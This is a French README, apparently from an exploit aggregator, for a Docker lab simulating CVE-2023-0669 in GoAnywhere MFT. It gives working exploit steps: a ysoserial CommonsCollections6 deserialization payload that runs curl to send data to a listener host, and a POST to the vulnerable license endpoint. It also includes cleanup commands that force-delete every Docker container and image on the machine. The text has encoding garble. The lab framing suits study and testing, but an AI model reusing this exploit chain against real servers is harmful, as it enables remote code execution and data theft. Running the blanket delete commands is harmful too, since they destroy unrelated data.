Share
## https://sploitus.com/exploit?id=B4AB59EF-7483-5722-85B6-EE4B6ED6D7FF
## Structure du projet
cve-2023-0669-simulation/
âââ docker-compose.yml
âââ attacker/
â âââ Dockerfile
â âââ CVE_2023_0669_helper.java
âââ vulnerable/
â âââ Dockerfile
â âââ VulnerableServer.java
âââ listener/
â âââ Dockerfile
â âââ server.py
âââ received/ â créé automatiquement (exfiltration)
# 2. Démarre les 3 conteneurs (attaquant, vulnerable, listener)
docker-compose up --build
### ProblĂšme : erreur `KeyError: 'ContainerConfig'` lors de `docker compose up`
ce projet requiert :
- **Docker Engine : v24 ou v25 minimum**
- **Docker Compose : v2.20+** (inclus automatiquement avec Docker)
KeyError: 'ContainerConfig' lors de docker compose up Cela provient généralement de métadonnées Docker obsolÚtes ou corrompues, ou d'anciennes images.
Supprimer les conteneurs, images et métadonnées cassées :
docker compose down --remove-orphans
docker rm -f $(docker ps -aq)
docker rmi -f $(docker images -q)
Puis reconstruisez proprement :
docker compose build --no-cache
docker compose up
# 3. Entre dans le conteneur de lâattaquant
docker exec -it attacker bash
# Génération du payload safe (envoie juste un message)```
java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser
# Chiffrement du payload
java CVE_2023_0669_helper payload.ser 1
# â Copie toute la longue chaĂźne qui sâaffiche (Ctrl+A puis Ctrl+C)
# Envoi de lâexploit (remplace LA_CHAINE par ce que tu viens de copier)
curl -X POST http://vulnerable:8001/goanywhere/lic/accept \
-d "encryptedLicenseResponseData=LA_CHAĂNE_BASE64_ICI" \
-d "acceptLicense=true"
### 7. Résultat immédiat
Tu verras dans les logs du listener (ou dans le dossier `./received` sur ton PC) :
PWNED ! Reçu 42 bytes â PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...